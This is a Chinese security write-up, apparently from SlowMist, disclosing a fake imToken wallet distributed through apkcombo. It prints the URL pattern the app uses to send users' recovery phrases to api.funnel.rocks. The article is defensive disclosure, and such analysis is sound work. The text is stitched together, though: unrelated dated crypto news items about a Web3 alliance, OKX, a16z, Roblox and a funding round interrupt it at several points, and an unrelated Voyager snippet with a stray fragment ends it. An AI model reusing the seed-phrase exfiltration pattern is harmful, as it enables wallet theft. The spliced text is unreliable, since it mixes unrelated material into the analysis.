Web3 假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

慢雾安全团队建议使用钱包、交易所时请认准官方下载渠道并从多方进行验证。

原文:https://foresightnews.pro/article/h5Detail/31716

作者:山&耀

转自:ForesightNews

背景

基于区块链技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。

当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包「登录」;这与我们传统意义上的「登录」不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行「登录」,我们可以看到「登录」钱包时显示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而钱包是你在Web3世界中的唯一通行证。

国内首家区块链+WEB3创投联盟成立:金色财经报道,上海金融信息行业协会、上海金融数据港、清华大学全球私募股权研究院、InnoSpace、泰和泰律师事务所等机构宣布共同发起成立了国内首家区块链+WEB3创投联盟,将在行业指导、孵化与创投服务、科创风险股权投资、行业咨询、创业空间、法律等方面,为投资者和创业者提供一个一站式、全方位区块链+WEB3创业服务、合作共赢的平台,打造一个安全高效的区块链+WEB3生态圈,促进形成完整的区块链与WEB3产业链和成熟健康的市场。该联盟发起方之一上海金融数据港还宣布将启动金融数据港科技创新中心,中心将设有展示中心、培训中心、孵化加速器和大企业创新中心。(新浪香港)[2023/7/8 22:25:28]

俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。

OKX Web3钱包即将率先接入zkSync Era (zkSync 2.0):3月22日消息,为支持新公链发展和促进多链生态繁荣,OKX Web3钱包将于zkSync Era (zkSync 2.0)主网正式上线后24小时内,率先完成接入,届时,用户可使用App和插件Web3钱包管理自己在zkSync Era上的资产。

据了解,OKX Wallet是异构多链钱包,支持包含Arbitrum、Fantom、Avalanche、Optimistic等50+公链。同时内置DEX、NFT市场、赚币、Dapp探索5大一站式Web3板块,能够满足用户一站式Web3需求。[2023/3/22 13:19:53]

在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?

A16z首席法务官:监管机构错过了监管 Web3 的核心问题:金色财经报道,A16z首席法务官Jai Ramaswamy在第一天的会议“理性监管 Web3:千载难逢的机会”上发言称,监管机构错过了监管 Web3 的核心问题。Ramaswamy 在提供当今监管环境的背景下解释说,加密货币往往与三个主要监管领域接触:非法金融监管、资本形成和市场完整性以及金融稳定因素。

然而,他警告说,额外协议层的开发显然对建立在当前互联网骨干上的金融服务具有非常深远的影响,并将在全球范围内产生更广泛的影响。这些影响将跨越技术、技术外交、外交关系以及美国经济的形态。我不认为政策制定者和监管机构完全参与其中。由于“多层技术堆栈”的性质越来越多地与金融堆栈融合,因此创新与合规之间的空间出现了紧张局势。[2022/10/24 16:37:12]

网站分析

Roblox招聘Web3高级工程师,将虚拟物品或交易(NFT)放在区块链上:金色财经报道,元宇宙平台Roblox正在招聘一个Web3高级软件工程师来完成包括开发web3 解决方案并将它们与现有的Roblox技术集成在内的任务跨Roblox堆栈,以及帮助决定Roblox中web3的未来以及我们web3解决方案的性质。

招聘信息称,作为一名高级工程师,将帮助Roblox Marketplace做好web3准备,并支持在区块链和 Roblox上发生的数十亿个项目和交易。此外,Roblox应该不会很快推出NFT,因为职位描述强烈暗示Roblox中web3的未来仍在决定中。?[2022/8/5 12:04:48]

鉴于下载途径众多,我们今天以apkcombo为例看看,apkcombo是一个第三方应用市场,它提供的应用据官方说大部分来源于其他正规应用商店,但事实是否真如官方所说呢?

Web3原生社交应用Mysterious完成310万美元种子轮融资:4月7日消息,Web3原生社交应用Mysterious完成310万美元种子轮融资,参投方包括Streamlined Ventures、F.inc、Y Combinator、Protocol Labs、OrangeDAO、Global Coin Research,个人投资者包括Streamlined Ventures创始人Ullas Naik、Dokia Capital首席执行官aurel、Filecoin创始人Juan Benet。目前该应用尚未推出,用户可以注册等待列表。[2022/4/7 14:09:30]

我们先看下apkcombo的流量有多大:

据数据统计站点similarweb统计,apkcombo站点:

全球排名:1,809国家排名:7,370品类排名:168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:

那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:https://play.google.com/store/apps/details?id=im.token.app

由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为:https://apkcombo.com/downloader/#package=im.token.app

上图我们可以发现,apkcombo提供的版本为24.9.11,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。

在编写本文时imToken钱包的最新版本为2.11.3,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。

如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。

同时我们发现类似的下载站还有如:uptodown下载地址:https://imtoken.br.uptodown.com/android

我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:

钱包分析

在之前我们已经分析过不少假钱包的案例,如:2021-11-24我们披露:《慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。

我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:

根据逆向APK代码和实际分析流量包发现,助记词发送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

看下图,最早的「api.funnel.rocks」证书出现在2022-06-03,也就是攻击开始的大概时间:

俗话说一图胜千言,最后我们画一个流程图:

总结

目前这种局活动不仅活跃,甚至有扩大范围的趋势,每天都有新的受害者受。用户作为安全体系最薄弱的环节,应时刻保持怀疑之心,增强安全意识与风险意识,当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。

同时,如需使用钱包,请务必认准以下主流钱包App官方网址:

imToken钱包:https://token.im/TokenPocket钱包:https://www.tokenpocket.pro/TronLink钱包:https://www.tronlink.org/比特派钱包:https://bitpie.com/MetaMask钱包:https://metamask.io/TrustWallet:https://trustwallet.com/请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。

致谢:感谢在溯源过程中imToken官方提供的验证支持。

由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。

?

郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。

银河链

莱特币终止收购Voyager!VGX暴跌35%

感谢阅读!进裙关注公中呺:全因素热爱币安美国收购破产借贷平台Voyager一案路途多舛,尽管今年已两度获得破产法官的批准,但却接连受到来自美国证券交易委员会、纽约州金融服务部、德州证券委员会等美国政府监管机构的阻力.

[0:15ms0-2:747ms